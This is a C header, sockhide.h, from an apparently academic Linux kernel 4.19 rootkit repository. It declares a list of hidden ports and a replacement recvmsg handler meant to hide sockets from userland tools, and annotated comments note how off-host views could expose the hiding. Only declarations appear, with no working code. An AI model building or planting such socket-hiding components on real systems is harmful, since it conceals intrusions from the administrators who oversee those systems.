linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

sockhide.h (862B)


      1 #ifndef _GROUP7_SOCKHIDE_H
      2 #define _GROUP7_SOCKHIDE_H
      3 
/*
 * Protocol selector stored alongside each port in the list below.
 * The enumerator names suggest TCP/UDP over IPv4/IPv6; the values are the
 * implicit defaults (0..3), written out so the numbering is visible.
 */
typedef enum {
    tcp4 = 0,
    udp4 = 1,
    tcp6 = 2,
    udp6 = 3
} proto_t;

/*
 * Port number type. This header does not say whether values are kept in
 * host or network byte order -- NOTE(review): confirm against the callers.
 */
typedef unsigned short port_t;

/*
 * Node of a doubly linked list keyed by (port, proto).
 * The pointer typedef hides one level of indirection: every
 * port_list_t_ptr is a `struct port_list *`.
 */
typedef struct port_list port_list_t;
typedef port_list_t *port_list_t_ptr;

struct port_list {
    port_t port;          /* port this entry refers to */
    proto_t proto;        /* protocol the port is matched under */
    port_list_t_ptr prev; /* previous node */
    port_list_t_ptr next; /* next node */
};
     20 
/*
 * Interface of the socket-hiding component. Only declarations are visible
 * here; the behaviour described below is inferred from names and signatures
 * and must be confirmed against the implementation.
 *
 * Review note (defensive): as far as this interface shows, entries are keyed
 * on (port, protocol) only. If the recvmsg handler below filters what is
 * reported to userland, a socket listing taken on the host cannot be trusted
 * on its own; comparing it with an off-host view (packet capture,
 * hypervisor-side introspection) is how a discrepancy would surface.
 */

/*
 * The list object itself (not a pointer), defined in another translation
 * unit. Presumably the head of the hidden-port list -- confirm.
 */
extern port_list_t hidden_ports;

/* Enable / disable the hiding mechanism as a whole (presumed; bodies not shown). */
void hide_sockets(void);
void unhide_sockets(void);

/* Register / unregister one (port, proto) pair (presumed; bodies not shown). */
void hide_port(port_t port, proto_t proto);
void unhide_port(port_t port, proto_t proto);

/*
 * asmlinkage entry point that receives the saved register set. The shape
 * matches the pt_regs-based syscall handler convention, so this is
 * presumably a replacement recvmsg handler -- NOTE(review): confirm.
 */
asmlinkage ssize_t g7_recvmsg(struct pt_regs *regs);

/* Empties hidden_ports (presumed from the name; body not shown). */
void clear_hidden_ports(void);

/*
 * List helpers taking an explicit list pointer plus the (port, proto) key.
 * Ownership of nodes and the meaning of the returned pointers are not
 * stated in this header.
 */
bool list_contains_port(port_list_t_ptr list, port_t port, proto_t proto);
port_list_t_ptr find_port_in_list(port_list_t_ptr list, port_t port, proto_t proto);
port_list_t_ptr add_port_to_list(port_list_t_ptr list, port_t port, proto_t proto);
port_list_t_ptr remove_port_from_list(port_list_t_ptr list, port_t port, proto_t proto);
     36 
     37 #endif //_GROUP7_SOCKHIDE_H